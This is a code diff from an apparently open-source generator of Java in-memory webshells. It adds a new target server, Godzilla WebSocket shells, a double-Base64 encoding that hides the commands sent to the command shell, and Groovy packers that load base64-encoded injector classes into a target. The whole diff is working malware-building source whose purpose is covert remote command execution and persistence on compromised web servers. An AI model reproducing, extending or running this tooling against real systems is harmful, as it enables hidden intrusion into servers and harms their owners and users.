Dev

.gitignore

@@ -60,4 +60,5 @@ snippets/
 integration-test/**/apusic
 integration-test/**/bes
 integration-test/**/tongweb
-integration-test/**/inforsuite
+integration-test/**/inforsuite
+integration-test/**/primeton

boot/src/main/java/com/reajason/javaweb/boot/BootApplication.java

@@ -1,17 +1,23 @@
 package com.reajason.javaweb.boot;
 
+import com.reajason.javaweb.memshell.Server;
+import lombok.extern.slf4j.Slf4j;
 import org.springframework.boot.SpringApplication;
 import org.springframework.boot.autoconfigure.SpringBootApplication;
 
+import java.util.Arrays;
+
 /**
  * @author ReaJason
  */
 @SpringBootApplication
+@Slf4j
 public class BootApplication {
 
     public static void main(String[] args) {
-
         SpringApplication.run(BootApplication.class, args);
+        Server[] values = Server.values();
+        log.info("Supported servers: {}", Arrays.toString(values));
+        log.info("For another server, you can open a issue in GitHub, https://github.com/ReaJason/MemShellParty/issues/new?template=%E8%AF%B7%E6%B1%82%E9%80%82%E9%85%8D.md");
     }
-
 }

boot/src/main/java/com/reajason/javaweb/boot/controller/ConfigController.java

@@ -3,8 +3,10 @@
 import com.reajason.javaweb.memshell.Packers;
 import com.reajason.javaweb.memshell.Server;
 import com.reajason.javaweb.memshell.ShellTool;
+import com.reajason.javaweb.memshell.config.CommandConfig;
 import com.reajason.javaweb.memshell.server.AbstractShell;
 import org.springframework.web.bind.annotation.CrossOrigin;
+import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
@@ -58,4 +60,9 @@ public List<String> getPackers() {
         }
         return coreMap;
     }
+
+    @GetMapping("/command/encryptors")
+    public List<CommandConfig.Encryptor> getCommandEncryptors() {
+        return Arrays.stream(CommandConfig.Encryptor.values()).toList();
+    }
 }

boot/src/main/java/com/reajason/javaweb/boot/dto/GenerateRequest.java

@@ -28,6 +28,7 @@ static class ShellToolConfigDTO {
         private String headerName;
         private String headerValue;
         private String shellClassBase64;
+        private String encryptor;
     }
 
     public ShellToolConfig parseShellToolConfig() {
@@ -48,6 +49,7 @@ public ShellToolConfig parseShellToolConfig() {
             case Command -> CommandConfig.builder()
                     .shellClassName(shellToolConfig.getShellClassName())
                     .paramName(StringUtils.defaultIfBlank(shellToolConfig.getCommandParamName(), CommonUtil.getRandomString(8)))
+                    .encryptor(CommandConfig.Encryptor.fromString(shellToolConfig.getEncryptor()))
                     .build();
             case Suo5 -> Suo5Config.builder()
                     .shellClassName(shellToolConfig.getShellClassName())

generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java

@@ -2,6 +2,7 @@
 
 import com.reajason.javaweb.memshell.config.*;
 import com.reajason.javaweb.memshell.generator.*;
+import com.reajason.javaweb.memshell.generator.command.CommandGenerator;
 import com.reajason.javaweb.memshell.server.AbstractShell;
 import com.reajason.javaweb.memshell.utils.CommonUtil;
 import org.apache.commons.lang3.StringUtils;

generator/src/main/java/com/reajason/javaweb/memshell/Packers.java

@@ -15,7 +15,9 @@
 import com.reajason.javaweb.memshell.packer.deserialize.java.*;
 import com.reajason.javaweb.memshell.packer.el.ELPacker;
 import com.reajason.javaweb.memshell.packer.freemarker.FreemarkerPacker;
+import com.reajason.javaweb.memshell.packer.groovy.GroovyClassDefinerPacker;
 import com.reajason.javaweb.memshell.packer.groovy.GroovyPacker;
+import com.reajason.javaweb.memshell.packer.groovy.GroovyScriptEnginePacker;
 import com.reajason.javaweb.memshell.packer.jar.AgentJarPacker;
 import com.reajason.javaweb.memshell.packer.jar.DefaultJarPacker;
 import com.reajason.javaweb.memshell.packer.jexl.JEXLPacker;
@@ -90,6 +92,9 @@ public enum Packers {
     SpELSpringUtils(new SpELSpringUtilsPacker(), SpELPacker.class),
 
     Groovy(new GroovyPacker()),
+    GroovyClassDefiner(new GroovyClassDefinerPacker(), GroovyPacker.class),
+    GroovyScriptEngine(new GroovyScriptEnginePacker(), GroovyPacker.class),
+
     Freemarker(new FreemarkerPacker()),
     Velocity(new VelocityPacker()),
     JinJava(new JinJavaPacker()),

generator/src/main/java/com/reajason/javaweb/memshell/Server.java

@@ -131,6 +131,11 @@ public enum Server {
      */
     InforSuite(new InforSuiteShell()),
 
+    /**
+     * 普元中间件
+     */
+    Primeton(new GlassFishShell()),
+
     /**
      * XXL-JOB
      */
@@ -152,6 +157,8 @@ public enum Server {
                 .addShellClass(JAKARTA_LISTENER, GodzillaListener.class)
                 .addShellClass(VALVE, GodzillaValve.class)
                 .addShellClass(JAKARTA_VALVE, GodzillaValve.class)
+                .addShellClass(WEBSOCKET, GodzillaWebSocket.class)
+                .addShellClass(JAKARTA_WEBSOCKET, GodzillaWebSocket.class)
                 .addShellClass(SPRING_WEBMVC_INTERCEPTOR, GodzillaInterceptor.class)
                 .addShellClass(SPRING_WEBMVC_JAKARTA_INTERCEPTOR, GodzillaInterceptor.class)
                 .addShellClass(SPRING_WEBMVC_CONTROLLER_HANDLER, GodzillaControllerHandler.class)

generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java

@@ -16,4 +16,18 @@
 public class CommandConfig extends ShellToolConfig {
     @Builder.Default
     private String paramName = CommonUtil.getRandomString(8);
+
+    @Builder.Default
+    private Encryptor encryptor = Encryptor.RAW;
+
+    public enum Encryptor {
+        RAW, DOUBLE_BASE64;
+
+        public static Encryptor fromString(String encryptor) {
+            if (encryptor != null && encryptor.equals("DOUBLE_BASE64")) {
+                return DOUBLE_BASE64;
+            }
+            return RAW;
+        }
+    }
 }

generator/src/main/java/com/reajason/javaweb/memshell/generator/ListenerGenerator.java

@@ -6,8 +6,11 @@
 import net.bytebuddy.ByteBuddy;
 import net.bytebuddy.asm.Advice;
 import net.bytebuddy.asm.AsmVisitorWrapper;
+import net.bytebuddy.description.modifier.Ownership;
+import net.bytebuddy.description.modifier.Visibility;
 import net.bytebuddy.dynamic.DynamicType;
 import net.bytebuddy.dynamic.loading.ClassLoadingStrategy;
+import net.bytebuddy.implementation.FixedValue;
 
 import java.util.Collections;
 
@@ -21,19 +24,32 @@ public class ListenerGenerator {
 
     public static Class<?> generateListenerShellClass(Class<?> implInterceptor, Class<?> targetClass) {
         String newClassName = targetClass.getName() + CommonUtil.getRandomString(5);
+        boolean needAddGetFieldValue = false;
+        try {
+            targetClass.getMethod("getFieldValue", Object.class, String.class);
+        } catch (NoSuchMethodException e) {
+            needAddGetFieldValue = true;
+        }
 
-        try (DynamicType.Unloaded<?> unloaded = new ByteBuddy()
+        DynamicType.Builder<?> builder = new ByteBuddy()
                 .redefine(targetClass)
-                .name(newClassName)
-                .visit(new AsmVisitorWrapper.ForDeclaredMethods()
+                .name(newClassName).visit(new AsmVisitorWrapper.ForDeclaredMethods()
                         .method(named("getResponseFromRequest"),
                                 new MethodCallReplaceVisitorWrapper(
                                         newClassName,
                                         Collections.singleton(ShellCommonUtil.class.getName()))
                         )
                 )
-                .visit(Advice.to(implInterceptor).on(named("getResponseFromRequest")))
-                .make()) {
+                .visit(Advice.to(implInterceptor).on(named("getResponseFromRequest")));
+
+        if (needAddGetFieldValue) {
+            builder = builder.defineMethod("getFieldValue", Object.class, Visibility.PUBLIC, Ownership.STATIC)
+                    .withParameters(Object.class, String.class)
+                    .intercept(FixedValue.nullValue())
+                    .visit(Advice.to(ShellCommonUtil.GetFieldValueInterceptor.class).on(named("getFieldValue")));
+        }
+
+        try (DynamicType.Unloaded<?> unloaded = builder.make()) {
             return unloaded
                     .load(ListenerGenerator.class.getClassLoader(), ClassLoadingStrategy.Default.WRAPPER_PERSISTENT)
                     .getLoaded();

generator/src/main/java/com/reajason/javaweb/memshell/generator/CommandGenerator.java → generator/src/main/java/com/reajason/javaweb/memshell/generator/command/CommandGenerator.java

@@ -1,17 +1,21 @@
-package com.reajason.javaweb.memshell.generator;
+package com.reajason.javaweb.memshell.generator.command;
 
 import com.reajason.javaweb.ClassBytesShrink;
-import com.reajason.javaweb.buddy.LdcReAssignVisitorWrapper;
-import com.reajason.javaweb.buddy.LogRemoveMethodVisitor;
-import com.reajason.javaweb.buddy.ServletRenameVisitorWrapper;
-import com.reajason.javaweb.buddy.TargetJreVersionVisitorWrapper;
+import com.reajason.javaweb.buddy.*;
 import com.reajason.javaweb.memshell.ShellType;
 import com.reajason.javaweb.memshell.config.CommandConfig;
 import com.reajason.javaweb.memshell.config.ShellConfig;
+import com.reajason.javaweb.memshell.utils.ShellCommonUtil;
 import net.bytebuddy.ByteBuddy;
+import net.bytebuddy.asm.Advice;
+import net.bytebuddy.asm.AsmVisitorWrapper;
+import net.bytebuddy.description.modifier.Ownership;
+import net.bytebuddy.description.modifier.Visibility;
 import net.bytebuddy.dynamic.DynamicType;
+import net.bytebuddy.implementation.FixedValue;
 import org.apache.commons.lang3.StringUtils;
 
+import java.util.Collections;
 import java.util.HashMap;
 
 import static net.bytebuddy.matcher.ElementMatchers.named;
@@ -37,6 +41,7 @@ public DynamicType.Builder<?> getBuilder() {
         DynamicType.Builder<?> builder = new ByteBuddy()
                 .redefine(commandConfig.getShellClass())
                 .name(commandConfig.getShellClassName())
+                .field(named("paramName")).value(commandConfig.getParamName())
                 .visit(new TargetJreVersionVisitorWrapper(shellConfig.getTargetJreVersion()));
 
         if (shellConfig.isJakarta()) {
@@ -48,16 +53,29 @@ public DynamicType.Builder<?> getBuilder() {
         }
 
         String shellType = shellConfig.getShellType();
-        if (!ShellType.WEBSOCKET.equals(shellType)) {
-            if (StringUtils.startsWith(shellType, ShellType.AGENT)) {
-                builder = builder.visit(
-                        new LdcReAssignVisitorWrapper(new HashMap<Object, Object>(1) {{
-                            put("paramName", commandConfig.getParamName());
-                        }})
-                );
-            } else {
-                builder = builder.field(named("paramName")).value(commandConfig.getParamName());
-            }
+
+        if (StringUtils.startsWith(shellType, ShellType.AGENT)) {
+            builder = builder.visit(
+                    new LdcReAssignVisitorWrapper(new HashMap<Object, Object>(1) {{
+                        put("paramName", commandConfig.getParamName());
+                    }})
+            );
+        }
+
+        if (CommandConfig.Encryptor.DOUBLE_BASE64.equals(commandConfig.getEncryptor())) {
+            builder = builder
+                    .visit(new AsmVisitorWrapper.ForDeclaredMethods()
+                            .method(named("getParam"),
+                                    new MethodCallReplaceVisitorWrapper(
+                                            commandConfig.getShellClassName(),
+                                            Collections.singleton(ShellCommonUtil.class.getName()))
+                            )
+                    )
+                    .defineMethod("base64DecodeToString", String.class, Visibility.PUBLIC, Ownership.STATIC)
+                    .withParameters(String.class)
+                    .intercept(FixedValue.nullValue())
+                    .visit(Advice.to(ShellCommonUtil.Base64DecodeToStringInterceptor.class).on(named("base64DecodeToString")))
+                    .visit(Advice.to(DoubleBase64ParamInterceptor.class).on(named("getParam")));
         }
 
         return builder;

generator/src/main/java/com/reajason/javaweb/memshell/generator/command/DoubleBase64ParamInterceptor.java

@@ -0,0 +1,16 @@
+package com.reajason.javaweb.memshell.generator.command;
+
+import com.reajason.javaweb.memshell.utils.ShellCommonUtil;
+import net.bytebuddy.asm.Advice;
+
+/**
+ * @author ReaJason
+ * @since 2025/4/27
+ */
+public class DoubleBase64ParamInterceptor {
+
+    @Advice.OnMethodExit
+    public static void enter(@Advice.Argument(value = 0) String param, @Advice.Return(readOnly = false) String returnValue) {
+        returnValue = ShellCommonUtil.base64DecodeToString(ShellCommonUtil.base64DecodeToString(param));
+    }
+}

generator/src/main/java/com/reajason/javaweb/memshell/packer/groovy/GroovyClassDefinerPacker.java

@@ -0,0 +1,35 @@
+package com.reajason.javaweb.memshell.packer.groovy;
+
+import com.reajason.javaweb.memshell.config.GenerateResult;
+import com.reajason.javaweb.memshell.packer.Packer;
+import lombok.SneakyThrows;
+import org.apache.commons.io.IOUtils;
+
+import java.io.IOException;
+import java.nio.charset.Charset;
+import java.util.Objects;
+
+/**
+ * @author ReaJason
+ * @since 2025/5/11
+ */
+public class GroovyClassDefinerPacker implements Packer {
+    String template = null;
+
+    public GroovyClassDefinerPacker() {
+        try {
+            template = IOUtils.toString(Objects.requireNonNull(this.getClass().getResourceAsStream("/shell.groovy")), Charset.defaultCharset());
+        } catch (IOException ignored) {
+
+        }
+    }
+
+    @Override
+    @SneakyThrows
+    public String pack(GenerateResult generateResult) {
+        String injectorBytesBase64Str = generateResult.getInjectorBytesBase64Str();
+        String injectorClassName = generateResult.getInjectorClassName();
+        return template.replace("{{className}}", injectorClassName)
+                .replace("{{base64Str}}", injectorBytesBase64Str);
+    }
+}

generator/src/main/java/com/reajason/javaweb/memshell/packer/groovy/GroovyPacker.java

@@ -1,19 +1,11 @@
 package com.reajason.javaweb.memshell.packer.groovy;
 
-import com.reajason.javaweb.memshell.Packers;
-import com.reajason.javaweb.memshell.config.GenerateResult;
-import com.reajason.javaweb.memshell.packer.Packer;
+import com.reajason.javaweb.memshell.packer.AggregatePacker;
 
 /**
  * @author ReaJason
  * @since 2024/12/13
  */
-public class GroovyPacker implements Packer {
-    String template = "new javax.script.ScriptEngineManager().getEngineByName('js').eval('{{script}}')";
+public class GroovyPacker implements AggregatePacker {
 
-    @Override
-    public String pack(GenerateResult generateResult) {
-        String script = Packers.ScriptEngine.getInstance().pack(generateResult);
-        return template.replace("{{script}}", script);
-    }
 }

generator/src/main/java/com/reajason/javaweb/memshell/packer/groovy/GroovyScriptEnginePacker.java

@@ -0,0 +1,19 @@
+package com.reajason.javaweb.memshell.packer.groovy;
+
+import com.reajason.javaweb.memshell.Packers;
+import com.reajason.javaweb.memshell.config.GenerateResult;
+import com.reajason.javaweb.memshell.packer.Packer;
+
+/**
+ * @author ReaJason
+ * @since 2024/12/13
+ */
+public class GroovyScriptEnginePacker implements Packer {
+    String template = "new javax.script.ScriptEngineManager().getEngineByName('js').eval('{{script}}')";
+
+    @Override
+    public String pack(GenerateResult generateResult) {
+        String script = Packers.ScriptEngine.getInstance().pack(generateResult);
+        return template.replace("{{script}}", script);
+    }
+}

generator/src/main/java/com/reajason/javaweb/memshell/server/JettyShell.java

@@ -20,7 +20,11 @@ public static void enter(@Advice.Argument(0) Object request, @Advice.Return(read
             try {
                 response = ShellCommonUtil.getFieldValue(ShellCommonUtil.getFieldValue(request, "_channel"), "_response");
             } catch (Exception e) {
-                response = ShellCommonUtil.getFieldValue(ShellCommonUtil.getFieldValue(request, "_connection"), "_response");
+                try {
+                    response = ShellCommonUtil.getFieldValue(ShellCommonUtil.getFieldValue(request, "_connection"), "_response");
+                } catch (Exception ex) {
+                    response = ShellCommonUtil.getFieldValue(ShellCommonUtil.getFieldValue(ShellCommonUtil.getFieldValue(request, "_servletChannel"), "_response"), "_servletApiResponse");
+                }
             }
         }
     }